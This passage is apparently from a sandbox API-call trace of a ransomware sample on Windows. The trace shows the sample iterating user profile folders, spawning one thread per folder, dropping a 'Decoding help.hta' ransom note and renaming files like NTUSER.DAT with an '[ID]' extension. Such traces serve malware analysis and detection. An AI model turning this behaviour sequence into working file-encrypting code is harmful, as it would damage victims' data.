nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0039.282] lstrcmpW (lpString1=".", lpString2="Documents") returned -1 [0039.282] lstrcmpW (lpString1="..", lpString2="Documents") returned -1 [0039.282] lstrcmpiW (lpString1="windows", lpString2="Documents") returned 1 [0039.282] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.282] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.282] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Documents" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0039.282] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0039.283] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0039.283] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x41f0528, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.289] CloseHandle (hObject=0x1c4) returned 1 [0039.289] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0039.289] lstrcmpW (lpString1=".", lpString2="Downloads") returned -1 [0039.289] lstrcmpW (lpString1="..", lpString2="Downloads") returned -1 [0039.289] lstrcmpiW (lpString1="windows", lpString2="Downloads") returned 1 [0039.289] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.289] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.289] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Downloads" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" [0039.289] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*" [0039.289] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0039.290] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4268730, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.297] CloseHandle (hObject=0x1c4) returned 1 [0039.297] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0039.297] lstrcmpW (lpString1=".", lpString2="Favorites") returned -1 [0039.297] lstrcmpW (lpString1="..", lpString2="Favorites") returned -1 [0039.297] lstrcmpiW (lpString1="windows", lpString2="Favorites") returned 1 [0039.299] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.299] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.299] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Favorites" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0039.299] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*" [0039.299] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0039.299] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9702160, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.305] CloseHandle (hObject=0x1c4) returned 1 [0039.306] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0039.306] lstrcmpW (lpString1=".", lpString2="Links") returned -1 [0039.306] lstrcmpW (lpString1="..", lpString2="Links") returned -1 [0039.306] lstrcmpiW (lpString1="windows", lpString2="Links") returned 1 [0039.307] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.307] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.307] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Links" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" [0039.307] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" [0039.307] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0039.307] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9732230, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.315] CloseHandle (hObject=0x1c4) returned 1 [0039.315] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0039.315] lstrcmpW (lpString1=".", lpString2="Local Settings") returned -1 [0039.315] lstrcmpW (lpString1="..", lpString2="Local Settings") returned -1 [0039.315] lstrcmpiW (lpString1="windows", lpString2="Local Settings") returned 1 [0039.316] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.316] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.316] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Local Settings" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" [0039.316] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*" [0039.316] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0039.316] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x974a298, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.325] CloseHandle (hObject=0x1c4) returned 1 [0039.325] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xffd0dd0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xffd0dd0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0039.325] lstrcmpW (lpString1=".", lpString2="Music") returned -1 [0039.326] lstrcmpW (lpString1="..", lpString2="Music") returned -1 [0039.326] lstrcmpiW (lpString1="windows", lpString2="Music") returned 1 [0039.327] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.327] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.327] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Music" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0039.327] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" [0039.327] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0039.327] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x977a368, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.337] CloseHandle (hObject=0x1c4) returned 1 [0039.337] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0039.338] lstrcmpW (lpString1=".", lpString2="My Documents") returned -1 [0039.338] lstrcmpW (lpString1="..", lpString2="My Documents") returned -1 [0039.338] lstrcmpiW (lpString1="windows", lpString2="My Documents") returned 1 [0039.338] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.338] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.338] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="My Documents" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents" [0039.338] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*" [0039.338] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0039.339] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x97da508, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.351] CloseHandle (hObject=0x1c4) returned 1 [0039.351] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0039.352] lstrcmpW (lpString1=".", lpString2="NetHood") returned -1 [0039.352] lstrcmpW (lpString1="..", lpString2="NetHood") returned -1 [0039.352] lstrcmpiW (lpString1="windows", lpString2="NetHood") returned 1 [0039.353] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.353] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.353] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="NetHood" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood" [0039.353] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*" [0039.353] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0039.353] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9852710, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.366] CloseHandle (hObject=0x1c4) returned 1 [0039.366] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2c30f920, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2c30f920, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0039.366] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.366] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.366] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta" [0039.366] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\decoding help.hta")) returned 0xffffffff [0039.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0039.366] WriteFile (in: hFile=0x1c4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x558fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x558fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.367] CloseHandle (hObject=0x1c4) returned 1 [0039.368] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.368] lstrcmpiW (lpString1="Decoding help.hta", lpString2="NTUSER.DAT") returned -1 [0039.368] lstrlenW (lpString="NTUSER.DAT") returned 10 [0039.368] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.368] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.368] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="NTUSER.DAT" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" [0039.368] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" [0039.368] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT.[ID]g9uZrLhJaygpwRm1[ID]" [0039.368] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.368] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2c16ca00, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0039.368] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.368] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.368] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta" [0039.368] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\decoding help.hta")) returned 0x1 [0039.368] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ntuser.dat.LOG1") returned -1 [0039.368] lstrlenW (lpString="ntuser.dat.LOG1") returned 15 [0039.368] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.368] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.368] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="ntuser.dat.LOG1" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" [0039.368] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" [0039.368] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.[ID]g9uZrLhJaygpwRm1[ID]" [0039.369] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.369] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0039.369] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.369] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.369] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta" [0039.369] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\decoding help.hta")) returned 0x1 [0039.369] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0039.369] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.369] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.369] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", 